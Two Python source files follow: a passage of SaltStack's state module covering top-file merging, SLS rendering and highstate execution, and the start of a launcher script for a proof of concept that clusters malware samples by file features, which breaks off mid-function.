"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as the "
"top_file_merging_strategy is set to 'merge' "
"and the saltenvs do not match",
saltenv,
cenv,
)
continue
elif saltenv in top:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as this "
"saltenv was already defined in the 'base' top "
"file",
saltenv,
cenv,
)
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def _merge_tops_same(self, tops):
"""
For each saltenv, only consider the top file from that saltenv. All
sections matching a given saltenv, which appear in a different
saltenv's top file, will be ignored.
"""
top = DefaultOrderedDict(OrderedDict)
for cenv, ctops in tops.items():
if all([x == {} for x in ctops]):
# No top file found in this env, check the default_top
default_top = self.opts["default_top"]
fallback_tops = tops.get(default_top, [])
if all([x == {} for x in fallback_tops]):
# Nothing in the fallback top file
log.error(
"The '%s' saltenv has no top file, and the fallback "
"saltenv specified by default_top (%s) also has no "
"top file",
cenv,
default_top,
)
continue
for ctop in fallback_tops:
for saltenv, targets in ctop.items():
if saltenv != cenv:
continue
log.debug(
"The '%s' saltenv has no top file, using the "
"default_top saltenv (%s)",
cenv,
default_top,
)
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
break
else:
log.error(
"The '%s' saltenv has no top file, and no "
"matches were found in the top file for the "
"default_top saltenv (%s)",
cenv,
default_top,
)
continue
else:
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
elif saltenv != cenv:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as the "
"top_file_merging_strategy is set to 'same' "
"and the saltenvs do not match",
saltenv,
cenv,
)
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def _merge_tops_merge_all(self, tops):
"""
Merge the top files into a single dictionary
"""
def _read_tgt(tgt):
match_type = None
states = []
for item in tgt:
if isinstance(item, dict):
match_type = item
if isinstance(item, str):
states.append(item)
return match_type, states
top = DefaultOrderedDict(OrderedDict)
for ctops in tops.values():
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
try:
for tgt in targets:
if tgt not in top[saltenv]:
top[saltenv][tgt] = ctop[saltenv][tgt]
continue
m_type1, m_states1 = _read_tgt(top[saltenv][tgt])
m_type2, m_states2 = _read_tgt(ctop[saltenv][tgt])
merged = []
match_type = m_type2 or m_type1
if match_type is not None:
merged.append(match_type)
merged.extend(m_states1)
merged.extend([x for x in m_states2 if x not in merged])
top[saltenv][tgt] = merged
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def verify_tops(self, tops):
"""
Verify the contents of the top file data
"""
errors = []
if not isinstance(tops, dict):
errors.append("Top data was not formed as a dict")
# No further checks will work, bail out
return errors
for saltenv, matches in tops.items():
if saltenv == "include":
continue
if not isinstance(saltenv, str):
errors.append(
"Environment {} in top file is not formed as a "
"string".format(saltenv)
)
if saltenv == "":
errors.append("Empty saltenv statement in top file")
if not isinstance(matches, dict):
errors.append(
"The top file matches for saltenv {} are not "
"formatted as a dict".format(saltenv)
)
for slsmods in matches.values():
if not isinstance(slsmods, list):
errors.append(
"Malformed topfile (state declarations not " "formed as a list)"
)
continue
for slsmod in slsmods:
if isinstance(slsmod, dict):
# This value is a match option
for val in slsmod.values():
if not val:
errors.append(
"Improperly formatted top file matcher "
"in saltenv {}: {} file".format(slsmod, val)
)
elif isinstance(slsmod, str):
# This is a sls module
if not slsmod:
errors.append(
"Environment {} contains an empty sls "
"index".format(saltenv)
)
return errors
def get_top(self):
"""
Returns the high data derived from the top file
"""
try:
tops = self.get_tops()
except SaltRenderError as err:
log.error("Unable to render top file: %s", err.error)
return {}
return self.merge_tops(tops)
def top_matches(self, top):
"""
Search through the top high data for matches and return the states
that this minion needs to execute.
Returns:
{'saltenv': ['state1', 'state2', ...]}
"""
matches = DefaultOrderedDict(OrderedDict)
# pylint: disable=cell-var-from-loop
for saltenv, body in top.items():
if self.opts["saltenv"]:
if saltenv != self.opts["saltenv"]:
continue
for match, data in body.items():
def _filter_matches(_match, _data, _opts):
if isinstance(_data, str):
_data = [_data]
if self.matchers["confirm_top.confirm_top"](_match, _data, _opts):
if saltenv not in matches:
matches[saltenv] = []
for item in _data:
if "subfilter" in item:
_tmpdata = item.pop("subfilter")
for match, data in _tmpdata.items():
_filter_matches(match, data, _opts)
if isinstance(item, str):
matches[saltenv].append(item)
elif isinstance(item, dict):
env_key, inc_sls = item.popitem()
if env_key not in self.avail:
continue
if env_key not in matches:
matches[env_key] = []
matches[env_key].append(inc_sls)
_filter_matches(match, data, self.opts["nodegroups"])
ext_matches = self._master_tops()
for saltenv in ext_matches:
top_file_matches = matches.get(saltenv, [])
if self.opts.get("master_tops_first"):
first = ext_matches[saltenv]
second = top_file_matches
else:
first = top_file_matches
second = ext_matches[saltenv]
matches[saltenv] = first + [x for x in second if x not in first]
# pylint: enable=cell-var-from-loop
return matches
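# Illustrative sketch (assumed data, not part of the module): for top data like
#
#   {'base': {'web*': ['apache', 'apache.config'], 'db*': ['mysql']}}
#
# a minion whose ID matches 'web*' (with the default glob matcher) gets back
#
#   {'base': ['apache', 'apache.config']}
#
# with any master_tops results merged in afterwards (or placed first when
# master_tops_first is set).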
def _master_tops(self):
"""
Get results from the master_tops system. Override this function if the
execution of the master_tops needs customization.
"""
return self.client.master_tops()
def load_dynamic(self, matches):
"""
If autoload_dynamic_modules is True then automatically load the
dynamic modules
"""
if not self.opts["autoload_dynamic_modules"]:
return
syncd = self.state.functions["saltutil.sync_all"](list(matches), refresh=False)
if syncd["grains"]:
self.opts["grains"] = salt.loader.grains(self.opts)
self.state.opts["pillar"] = self.state._gather_pillar()
self.state.module_refresh()
def render_state(self, sls, saltenv, mods, matches, local=False, context=None):
"""
Render a state file and retrieve all of the include states
"""
errors = []
if not local:
state_data = self.client.get_state(sls, saltenv)
fn_ = state_data.get("dest", False)
else:
fn_ = sls
if not os.path.isfile(fn_):
errors.append(
"Specified SLS {} on local filesystem cannot "
"be found.".format(sls)
)
state = None
if not fn_:
errors.append(
"Specified SLS {} in saltenv {} is not "
"available on the salt master or through a configured "
"fileserver".format(sls, saltenv)
)
else:
try:
state = compile_template(
fn_,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv,
sls,
rendered_sls=mods,
context=context,
)
except SaltRenderError as exc:
msg = "Rendering SLS '{}:{}' failed: {}".format(saltenv, sls, exc)
log.critical(msg)
errors.append(msg)
except Exception as exc: # pylint: disable=broad-except
msg = "Rendering SLS {} failed, render error: {}".format(sls, exc)
log.critical(
msg,
# Show the traceback if the debug logging level is enabled
exc_info_on_loglevel=logging.DEBUG,
)
errors.append("{}\n{}".format(msg, traceback.format_exc()))
try:
mods.add("{}:{}".format(saltenv, sls))
except AttributeError:
pass
if state:
if not isinstance(state, dict):
errors.append("SLS {} does not render to a dictionary".format(sls))
else:
include = []
if "include" in state:
if not isinstance(state["include"], list):
err = (
"Include Declaration in SLS {} is not formed "
"as a list".format(sls)
)
errors.append(err)
else:
include = state.pop("include")
self._handle_extend(state, sls, saltenv, errors)
self._handle_exclude(state, sls, saltenv, errors)
self._handle_state_decls(state, sls, saltenv, errors)
for inc_sls in include:
# inc_sls may take the form of:
# 'sls.to.include' <- same as {<saltenv>: 'sls.to.include'}
# {<env_key>: 'sls.to.include'}
# {'_xenv': 'sls.to.resolve'}
xenv_key = "_xenv"
if isinstance(inc_sls, dict):
env_key, inc_sls = inc_sls.popitem()
else:
env_key = saltenv
if env_key not in self.avail:
msg = (
"Nonexistent saltenv '{}' found in include "
"of '{}' within SLS '{}:{}'".format(
env_key, inc_sls, saltenv, sls
)
)
log.error(msg)
errors.append(msg)
continue
if inc_sls.startswith("."):
match = re.match(r"^(\.+)(.*)$", inc_sls)
if match:
levels, include = match.groups()
else:
msg = (
"Badly formatted include {0} found in include "
"in SLS '{2}:{3}'".format(inc_sls, saltenv, sls)
)
log.error(msg)
errors.append(msg)
continue
level_count = len(levels)
p_comps = sls.split(".")
if state_data.get("source", "").endswith("/init.sls"):
p_comps.append("init")
if level_count > len(p_comps):
msg = (
"Attempted relative include of '{}' "
"within SLS '{}:{}' "
"goes beyond top level package ".format(
inc_sls, saltenv, sls
)
)
log.error(msg)
errors.append(msg)
continue
inc_sls = ".".join(p_comps[:-level_count] + [include])
if env_key != xenv_key:
if matches is None:
matches = []
# Resolve inc_sls in the specified environment
if env_key in matches or fnmatch.filter(
self.avail[env_key], inc_sls
):
resolved_envs = [env_key]
else:
resolved_envs = []
else:
# Resolve inc_sls in the subset of environment matches
resolved_envs = [
aenv
for aenv in matches
if fnmatch.filter(self.avail[aenv], inc_sls)
]
# An include must be resolved to a single environment, or
# the include must exist in the current environment
if len(resolved_envs) == 1 or saltenv in resolved_envs:
# Match inc_sls against the available states in the
# resolved env, matching wildcards in the process. If
# there were no matches, then leave inc_sls as the
# target so that the next recursion of render_state
# will recognize the error.
sls_targets = fnmatch.filter(self.avail[saltenv], inc_sls) or [
inc_sls
]
for sls_target in sls_targets:
r_env = (
resolved_envs[0] if len(resolved_envs) == 1 else saltenv
)
mod_tgt = "{}:{}".format(r_env, sls_target)
if mod_tgt not in mods:
nstate, err = self.render_state(
sls_target, r_env, mods, matches
)
if nstate:
self.merge_included_states(state, nstate, errors)
state.update(nstate)
if err:
errors.extend(err)
else:
msg = ""
if not resolved_envs:
msg = (
"Unknown include: Specified SLS {}: {} is not available on the salt "
"master in saltenv(s): {} "
).format(
env_key,
inc_sls,
", ".join(matches) if env_key == xenv_key else env_key,
)
elif len(resolved_envs) > 1:
msg = (
"Ambiguous include: Specified SLS {}: {} is available on the salt master "
"in multiple available saltenvs: {}"
).format(env_key, inc_sls, ", ".join(resolved_envs))
log.critical(msg)
errors.append(msg)
try:
self._handle_iorder(state)
except TypeError:
log.critical("Could not render SLS %s. Syntax error detected.", sls)
else:
state = {}
return state, errors
def _handle_iorder(self, state):
"""
Take a state and apply the iorder system
"""
if self.opts["state_auto_order"]:
for name in state:
for s_dec in state[name]:
if not isinstance(s_dec, str):
# PyDSL OrderedDict?
continue
if not isinstance(state[name], dict):
# Includes or excludes as lists?
continue
if not isinstance(state[name][s_dec], list):
# Bad syntax, let the verify seq pick it up later on
continue
found = False
if s_dec.startswith("_"):
continue
for arg in state[name][s_dec]:
if isinstance(arg, dict):
if len(arg) > 0:
if next(iter(arg.keys())) == "order":
found = True
if not found:
if not isinstance(state[name][s_dec], list):
# quite certainly a syntax error, managed elsewhere
continue
state[name][s_dec].append({"order": self.iorder})
self.iorder += 1
return state
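# Illustrative sketch (assumed SLS data, not part of the module): with
# state_auto_order enabled and self.iorder starting at 10000, a rendered chunk
#
#   {'vim': {'__sls__': 'edit', '__env__': 'base', 'pkg': ['installed']}}
#
# leaves _handle_iorder as
#
#   {'vim': {'__sls__': 'edit', '__env__': 'base',
#            'pkg': ['installed', {'order': 10000}]}}
#
# so declaration order in the SLS file is preserved at execution time.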
def _handle_state_decls(self, state, sls, saltenv, errors):
"""
Add sls and saltenv components to the state
"""
for name in state:
if not isinstance(state[name], dict):
if name == "__extend__":
continue
if name == "__exclude__":
continue
if isinstance(state[name], str):
# If this is a short state, it needs to be padded
if "." in state[name]:
comps = state[name].split(".")
state[name] = {
"__sls__": sls,
"__env__": saltenv,
comps[0]: [comps[1]],
}
continue
errors.append("ID {} in SLS {} is not a dictionary".format(name, sls))
continue
skeys = set()
for key in list(state[name]):
if key.startswith("_"):
continue
if not isinstance(state[name][key], list):
continue
if "." in key:
comps = key.split(".")
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - source: salt://redis/redis.conf
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
"ID '{}' in SLS '{}' contains multiple state "
"declarations of the same type".format(name, sls)
)
continue
state[name][comps[0]] = state[name].pop(key)
state[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
if "__sls__" not in state[name]:
state[name]["__sls__"] = sls
if "__env__" not in state[name]:
state[name]["__env__"] = saltenv
def _handle_extend(self, state, sls, saltenv, errors):
"""
Take the extend dec out of state and apply to the highstate global
dec
"""
if "extend" in state:
ext = state.pop("extend")
if not isinstance(ext, dict):
errors.append(
("Extension value in SLS '{}' is not a " "dictionary").format(sls)
)
return
for name in ext:
if not isinstance(ext[name], dict):
errors.append(
"Extension name '{}' in SLS '{}' is "
"not a dictionary".format(name, sls)
)
continue
if "__sls__" not in ext[name]:
ext[name]["__sls__"] = sls
if "__env__" not in ext[name]:
ext[name]["__env__"] = saltenv
for key in list(ext[name]):
if key.startswith("_"):
continue
if not isinstance(ext[name][key], list):
continue
if "." in key:
comps = key.split(".")
ext[name][comps[0]] = ext[name].pop(key)
ext[name][comps[0]].append(comps[1])
state.setdefault("__extend__", []).append(ext)
def _handle_exclude(self, state, sls, saltenv, errors):
"""
Take the exclude dec out of the state and apply it to the highstate
global dec
"""
if "exclude" in state:
exc = state.pop("exclude")
if not isinstance(exc, list):
err = "Exclude Declaration in SLS {} is not formed " "as a list".format(
sls
)
errors.append(err)
state.setdefault("__exclude__", []).extend(exc)
def render_highstate(self, matches, context=None):
"""
Gather the state files and render them into a single unified salt
high data structure.
"""
highstate = self.building_highstate
all_errors = []
mods = set()
statefiles = []
for saltenv, states in matches.items():
for sls_match in states:
if saltenv in self.avail:
statefiles = fnmatch.filter(self.avail[saltenv], sls_match)
elif "__env__" in self.avail:
statefiles = fnmatch.filter(self.avail["__env__"], sls_match)
else:
all_errors.append(
"No matching salt environment for environment "
"'{}' found".format(saltenv)
)
# If we did not find any SLS in the fileserver listing, it may be
# because the SLS was generated or added later. Try to execute it
# directly; if that fails, it will simply return the original error.
if not statefiles:
statefiles = [sls_match]
for sls in statefiles:
r_env = "{}:{}".format(saltenv, sls)
if r_env in mods:
continue
state, errors = self.render_state(
sls, saltenv, mods, matches, context=context
)
if state:
self.merge_included_states(highstate, state, errors)
for i, error in enumerate(errors[:]):
if "is not available" in error:
# match SLS foobar in environment
this_sls = "SLS {} in saltenv".format(sls_match)
if this_sls in error:
errors[i] = (
"No matching sls found for '{}' "
"in env '{}'".format(sls_match, saltenv)
)
all_errors.extend(errors)
self.clean_duplicate_extends(highstate)
return highstate, all_errors
def clean_duplicate_extends(self, highstate):
if "__extend__" in highstate:
highext = []
for items in (ext.items() for ext in highstate["__extend__"]):
for item in items:
if item not in highext:
highext.append(item)
highstate["__extend__"] = [{t[0]: t[1]} for t in highext]
def merge_included_states(self, highstate, state, errors):
# The extend members can not be treated as globally unique:
if "__extend__" in state:
highstate.setdefault("__extend__", []).extend(state.pop("__extend__"))
if "__exclude__" in state:
highstate.setdefault("__exclude__", []).extend(state.pop("__exclude__"))
for id_ in state:
if id_ in highstate:
if highstate[id_] != state[id_]:
errors.append(
(
"Detected conflicting IDs, SLS"
" IDs need to be globally unique.\n The"
" conflicting ID is '{}' and is found in SLS"
" '{}:{}' and SLS '{}:{}'"
).format(
id_,
highstate[id_]["__env__"],
highstate[id_]["__sls__"],
state[id_]["__env__"],
state[id_]["__sls__"],
)
)
try:
highstate.update(state)
except ValueError:
errors.append("Error when rendering state with contents: {}".format(state))
def _check_pillar(self, force=False):
"""
Check the pillar for errors, refuse to run the state if there are
errors in the pillar and return the pillar errors
"""
if force:
return True
if "_errors" in self.state.opts["pillar"]:
return False
return True
def matches_whitelist(self, matches, whitelist):
"""
Reads over the matches and returns a matches dict with just the ones
that are in the whitelist
"""
if not whitelist:
return matches
ret_matches = {}
if not isinstance(whitelist, list):
whitelist = whitelist.split(",")
for env in matches:
for sls in matches[env]:
if sls in whitelist:
ret_matches[env] = ret_matches[env] if env in ret_matches else []
ret_matches[env].append(sls)
return ret_matches
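# Illustrative sketch (assumed data, not part of the module): with
#
#   matches   = {'base': ['apache', 'mysql'], 'dev': ['apache']}
#   whitelist = 'apache'        # a comma-separated string or a list
#
# matches_whitelist returns {'base': ['apache'], 'dev': ['apache']}; only the
# whitelisted SLS names survive, per saltenv.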
def call_highstate(
self,
exclude=None,
cache=None,
cache_name="highstate",
force=False,
whitelist=None,
orchestration_jid=None,
):
"""
Run the sequence to execute the salt highstate for this minion
"""
# Check that top file exists
tag_name = "no_|-states_|-states_|-None"
ret = {
tag_name: {
"result": False,
"comment": "No states found for this minion",
"name": "No States",
"changes": {},
"__run_num__": 0,
}
}
cfn = os.path.join(self.opts["cachedir"], "{}.cache.p".format(cache_name))
if cache:
if os.path.isfile(cfn):
with salt.utils.files.fopen(cfn, "rb") as fp_:
high = self.serial.load(fp_)
return self.state.call_high(high, orchestration_jid)
# No usable cache (or caching not requested), so build the highstate from the top file
err = []
try:
top = self.get_top()
except SaltRenderError as err:
ret[tag_name]["comment"] = "Unable to render top file: "
ret[tag_name]["comment"] += str(err.error)
return ret
except Exception: # pylint: disable=broad-except
trb = traceback.format_exc()
err.append(trb)
return err
err += self.verify_tops(top)
matches = self.top_matches(top)
if not matches:
msg = (
"No Top file or master_tops data matches found. Please see "
"master log for details."
)
ret[tag_name]["comment"] = msg
return ret
matches = self.matches_whitelist(matches, whitelist)
self.load_dynamic(matches)
if not self._check_pillar(force):
err += ["Pillar failed to render with the following messages:"]
err += self.state.opts["pillar"]["_errors"]
else:
high, errors = self.render_highstate(matches)
if exclude:
if isinstance(exclude, str):
exclude = exclude.split(",")
if "__exclude__" in high:
high["__exclude__"].extend(exclude)
else:
high["__exclude__"] = exclude
err += errors
if err:
return err
if not high:
return ret
with salt.utils.files.set_umask(0o077):
try:
if salt.utils.platform.is_windows():
# Make sure cache file isn't read-only
self.state.functions["cmd.run"](
["attrib", "-R", cfn],
python_shell=False,
output_loglevel="quiet",
)
with salt.utils.files.fopen(cfn, "w+b") as fp_:
try:
self.serial.dump(high, fp_)
except TypeError:
# Can't serialize pydsl
pass
except OSError:
log.error('Unable to write to "state.highstate" cache file %s', cfn)
return self.state.call_high(high, orchestration_jid)
def compile_highstate(self):
"""
Return just the highstate or the errors
"""
err = []
top = self.get_top()
err += self.verify_tops(top)
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
err += errors
if err:
return err
return high
def compile_low_chunks(self):
"""
Compile the highstate but don't run it, return the low chunks to
see exactly what the highstate will execute
"""
top = self.get_top()
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
# If there is extension data reconcile it
high, ext_errors = self.state.reconcile_extend(high)
errors += ext_errors
# Verify that the high data is structurally sound
errors += self.state.verify_high(high)
high, req_in_errors = self.state.requisite_in(high)
errors += req_in_errors
high = self.state.apply_exclude(high)
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.state.compile_high_data(high)
return chunks
def compile_state_usage(self):
"""
Return all used and unused states for the minion based on the top match data
"""
err = []
top = self.get_top()
err += self.verify_tops(top)
if err:
return err
matches = self.top_matches(top)
state_usage = {}
for saltenv, states in self.avail.items():
env_usage = {
"used": [],
"unused": [],
"count_all": 0,
"count_used": 0,
"count_unused": 0,
}
env_matches = matches.get(saltenv)
for state in states:
env_usage["count_all"] += 1
if state in env_matches:
env_usage["count_used"] += 1
env_usage["used"].append(state)
else:
env_usage["count_unused"] += 1
env_usage["unused"].append(state)
state_usage[saltenv] = env_usage
return state_usage
class HighState(BaseHighState):
"""
Generate and execute the salt "High State". The High State is the
compound state derived from a group of template files stored on the
salt master or in the local cache.
"""
# a stack of active HighState objects during a state.highstate run
stack = []
def __init__(
self,
opts,
pillar_override=None,
jid=None,
pillar_enc=None,
proxy=None,
context=None,
mocked=False,
loader="states",
initial_pillar=None,
):
self.opts = opts
self.client = salt.fileclient.get_file_client(self.opts)
BaseHighState.__init__(self, opts)
self.state = State(
self.opts,
pillar_override,
jid,
pillar_enc,
proxy=proxy,
context=context,
mocked=mocked,
loader=loader,
initial_pillar=initial_pillar,
)
self.matchers = salt.loader.matchers(self.opts)
self.proxy = proxy
# tracks all pydsl state declarations globally across sls files
self._pydsl_all_decls = {}
# a stack of current rendering Sls objects, maintained and used by the pydsl renderer.
self._pydsl_render_stack = []
def push_active(self):
self.stack.append(self)
@classmethod
def clear_active(cls):
# Nuclear option
#
# Blow away the entire stack. Used primarily by the test runner but also
# useful in custom wrappers of the HighState class, to reset the stack
# to a fresh state.
cls.stack = []
@classmethod
def pop_active(cls):
cls.stack.pop()
@classmethod
def get_active(cls):
try:
return cls.stack[-1]
except IndexError:
return None
class MasterState(State):
"""
Create a State object for master side compiling
"""
def __init__(self, opts, minion):
State.__init__(self, opts)
def load_modules(self, data=None, proxy=None):
"""
Load the modules into the state
"""
log.info("Loading fresh modules for state activity")
# Load a modified client interface that looks like the interface used
# from the minion, but uses remote execution
#
self.functions = salt.client.FunctionWrapper(self.opts, self.opts["id"])
# Load the states, but they should not be used in this class apart
# from inspection
self.utils = salt.loader.utils(self.opts)
self.serializers = salt.loader.serializers(self.opts)
self.states = salt.loader.states(
self.opts, self.functions, self.utils, self.serializers
)
self.rend = salt.loader.render(
self.opts, self.functions, states=self.states, context=self.state_con
)
class MasterHighState(HighState):
"""
Execute highstate compilation from the master
"""
def __init__(self, master_opts, minion_opts, grains, id_, saltenv=None):
# Force the fileclient to be local
opts = copy.deepcopy(minion_opts)
opts["file_client"] = "local"
opts["file_roots"] = master_opts["master_roots"]
opts["renderer"] = master_opts["renderer"]
opts["state_top"] = master_opts["state_top"]
opts["id"] = id_
opts["grains"] = grains
HighState.__init__(self, opts)
class RemoteHighState:
"""
Manage gathering the data from the master
"""
# XXX: This class doesn't seem to be used anywhere
def __init__(self, opts, grains):
self.opts = opts
self.grains = grains
self.serial = salt.payload.Serial(self.opts)
# self.auth = salt.crypt.SAuth(opts)
self.channel = salt.transport.client.ReqChannel.factory(self.opts["master_uri"])
self._closing = False
def compile_master(self):
"""
Return the state data from the master
"""
load = {"grains": self.grains, "opts": self.opts, "cmd": "_master_state"}
try:
return self.channel.send(load, tries=3, timeout=72000)
except SaltReqTimeoutError:
return {}
def destroy(self):
if self._closing:
return
self._closing = True
self.channel.close()
# pylint: disable=W1701
def __del__(self):
self.destroy()
# pylint: enable=W1701
|
run.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
run - a script used for launching the PoC.
See README.md and help (./run -h) for details on usage.
Part of D&C-Clustering-POC
Copyright (c) 2020 Sturla Høgdahl Bae
"""
import argparse
import configparser
import multiprocessing
import os
import pickle
import queue
import time
from multiprocessing.managers import BaseManager
import clustering
import feature_extraction
# Data structure for storing files
files = {}
clusters = {
'imphash_clusters': {},
'icon_clusters': {},
'resource_clusters': {},
'tlsh_clusters': {}
}
# Retrieve configuration
config = configparser.ConfigParser()
config.read('config.ini')
PRINT_PROGRESS = config.getboolean('general', 'print_progress')
QUEUE_MANAGER_IP = config.get('queue_managers', 'ip')
JOB_MANAGER_PORT = config.getint('queue_managers', 'job_port')
DONE_MANAGER_PORT = config.getint('queue_managers', 'done_port')
QUEUE_MANAGER_KEY = config.get('queue_managers', 'key').encode('utf-8')
QUEUE_TIMEOUT = config.getint('queue_managers', 'timeout')
CLUSTER_WITH_VHASH = config.getboolean('clustering', 'cluster_with_vhash')
if CLUSTER_WITH_VHASH:
clusters['vhash_clusters'] = {}
# Define queue manager class
class QueueManager(BaseManager):
pass
QueueManager.register('get_queue')
def serve_simple_queue(ip, port, key):
"""
Start a queue on the specified port
Start this in a new thread/process, as the function will run "serve_forever()".
"""
simple_queue = queue.Queue()
QueueManager.register('get_queue', callable=lambda:simple_queue)
manager = QueueManager(address=(ip, port), authkey=key)
server = manager.get_server()
server.serve_forever()
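# Illustrative sketch (assumed address/key values, not part of this script):
# the queue server above is meant to run in its own process, after which any
# number of clients can attach to the same (ip, port, key) triple, e.g.
#
#   multiprocessing.Process(
#       target=serve_simple_queue,
#       args=('127.0.0.1', 48000, b'secret'),
#       daemon=True,
#   ).start()
#   client = QueueManager(address=('127.0.0.1', 48000), authkey=b'secret')
#   client.connect()
#   client.get_queue().put({'path': '/tmp/sample.exe', 'family': 'testfam'})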
def feature_extraction_worker(training=False):
"""
Connect to feature extraction (job) queue and clustering (job done) queue
If training is True, the file will be marked as being part of the training data set.
"""
job_manager = QueueManager(address=(QUEUE_MANAGER_IP, JOB_MANAGER_PORT), authkey=QUEUE_MANAGER_KEY)
done_manager = QueueManager(address=(QUEUE_MANAGER_IP, DONE_MANAGER_PORT), authkey=QUEUE_MANAGER_KEY)
try:
job_manager.connect()
done_manager.connect()
except Exception:
print("Cannot connect to queue manager. Please check the configuration.")
else:
job_queue = job_manager.get_queue()
done_queue = done_manager.get_queue()
while True:
try:
file_to_cluster = job_queue.get(timeout=QUEUE_TIMEOUT)
except EOFError:
print("Queue not available. Please check if the feature extraction queue manager is still running.")
break
except queue.Empty:
# Stop when queue is empty
break
else:
result = feature_extraction.analyse_file(file_to_cluster['path'], family=file_to_cluster['family'], incoming=True, training=training)
send_to_done_queue(result, done_queue)
def send_to_done_queue(fileinfo, done_queue):
"""
Recursively send files to the queue of
completed feature extraction jobs
"""
if fileinfo is not None:
for contained_info in fileinfo['contained_pe_fileinfo'].values():
send_to_done_queue(contained_info, done_queue)
fileinfo.pop('contained_pe_fileinfo')
done_queue.put(fileinfo)
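# Illustrative sketch (assumed data, not part of this script): for a dropper
# that unpacked one PE, e.g.
#
#   {'sha256': 'aaa...', 'contained_pe_fileinfo': {
#       'bbb...': {'sha256': 'bbb...', 'contained_pe_fileinfo': {}}}, ...}
#
# send_to_done_queue works depth-first: the contained file is queued first,
# each entry has its 'contained_pe_fileinfo' key stripped, and the outer file
# is queued last.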
def add_files_for_extraction(*file_list):
"""
Add files to the queue of files that should have their
features extracted and their data sent to clustering
"""
job_manager = QueueManager(address=(QUEUE_MANAGER_IP, JOB_MANAGER_PORT), authkey=QUEUE_MANAGER_KEY)
try: # Connect to feature extraction queue
job_manager.connect()
except Exception:
print("Cannot connect to queue manager. Make sure the daemon is running and the configuration is correct.")
else:
job_queue = job_manager.get_queue()
for item in file_list:
# Send all files in the list to the feature extraction queue
job_queue.put(item)
def get_done_queue():
"""
Retrieve a queue object from a queue manager created
with the options provided in the config file.
"""
done_manager = QueueManager(address=(QUEUE_MANAGER_IP, DONE_MANAGER_PORT), authkey=QUEUE_MANAGER_KEY)
try:
done_manager.connect()
except Exception:
print("Cannot connect to queue manager. Please try again or check the configuration.")
raise SystemExit
return done_manager.get_queue()
def get_fileinfo_from_done_queue(done_queue):
"""
Returns one fileinfo/file feature dictionary from
the provided queue object.
"""
try:
# Return file metadata from the done queue
return done_queue.get(timeout=QUEUE_TIMEOUT)
except EOFError:
print("Queue not available. Please check if the queue manager is still running.")
return None
except queue.Empty:
if PRINT_PROGRESS:
print("Done-queue empty. Stopping collection.")
return None
def collect_features(files):
"""
Retrieve fileinfo/file feature dictionaries from the
feature extraction workers and store the feature
information in the global "files" data structure.
"""
incoming_files_parsed = 0
done_queue = get_done_queue()
# Attempt to retrieve a file from the done queue
fileinfo = get_fileinfo_from_done_queue(done_queue)
# Continue while it is possible to retrieve a file
while fileinfo is not None:
fileinfo['training'] = True
if fileinfo['incoming']:
incoming_files_parsed += 1
if PRINT_PROGRESS:
print("Processing incoming file number: " + str(incoming_files_parsed))
# If file was successfully retrieved from queue
if fileinfo['sha256'] in files.keys():
# If file has been received and clustered before
# Merge new data into the existing data.
if PRINT_PROGRESS:
print("Merging file with existing information " + fileinfo['sha256'])
current_file = files[fileinfo['sha256']]
if fileinfo['incoming']:
current_file['incoming'] = True
else: # If file is not incoming (was unpacked from another file)
# Update "unpacks_from" since it might be contained in multiple different binaries
current_file['unpacks_from'].update(fileinfo['unpacks_from'])
else:
# If file has not been received before, add data
if PRINT_PROGRESS:
print("Storing file " + fileinfo['sha256'])
# Add file information to global data structure
files[fileinfo['sha256']] = fileinfo
# Attempt to retrieve next file and continue loop
fileinfo = get_fileinfo_from_done_queue(done_queue)
def cluster_and_validate_incoming(files, clusters):
"""
Cluster and perform validation on files that are in the
feature extraction job done queue.
"""
done_queue = get_done_queue()
incoming_files_parsed = 0
correctly_labelled = 0
incorrectly_labelled = 0
not_labelled = 0
labelled_packed = 0
not_labelled_packed = 0
fast_clustered = 0
fast_clustered_incoming = 0
slow_clustered = 0
slow_clustered_incoming = 0
# Attempt to retrieve a file from the done queue
fileinfo = get_fileinfo_from_done_queue(done_queue)
# Continue while it is possible to retrieve a file
while fileinfo is not None:
if fileinfo['incoming']:
incoming_files_parsed += 1
if PRINT_PROGRESS:
print("Clustering incoming file number: " + str(incoming_files_parsed))
# If file was successfully retrieved from queue
if fileinfo['sha256'] in files.keys():
# If file has been received and clustered before
# Merge new data into the existing data.
if PRINT_PROGRESS:
print("Merging file with existing information " + fileinfo['sha256'])
current_file = files[fileinfo['sha256']]
if fileinfo['incoming']:
current_file['incoming'] = True
else: # If file is not incoming (was unpacked from another file)
# Update "unpacks_from" since it might be contained in multiple different binaries
current_file['unpacks_from'].update(fileinfo['unpacks_from'])
else:
# If file has not been received before, add data
if PRINT_PROGRESS:
print("Storing file " + fileinfo['sha256'])
# Add file to global data structure
files[fileinfo['sha256']] = fileinfo
# Cluster the file
if clustering.cluster_file(fileinfo, files, clusters):
fast_clustered += 1
if fileinfo['incoming']:
fast_clustered_incoming += 1
else:
slow_clustered += 1
if fileinfo['incoming']:
slow_clustered_incoming += 1
# Label the file
clustering.label_file(fileinfo, files, clusters)
if fileinfo['incoming']:
# Check if correctly labelled and store results
if fileinfo['given_label'] is not None:
if fileinfo['family'] == fileinfo['given_label']:
correctly_labelled += 1
else:
incorrectly_labelled += 1
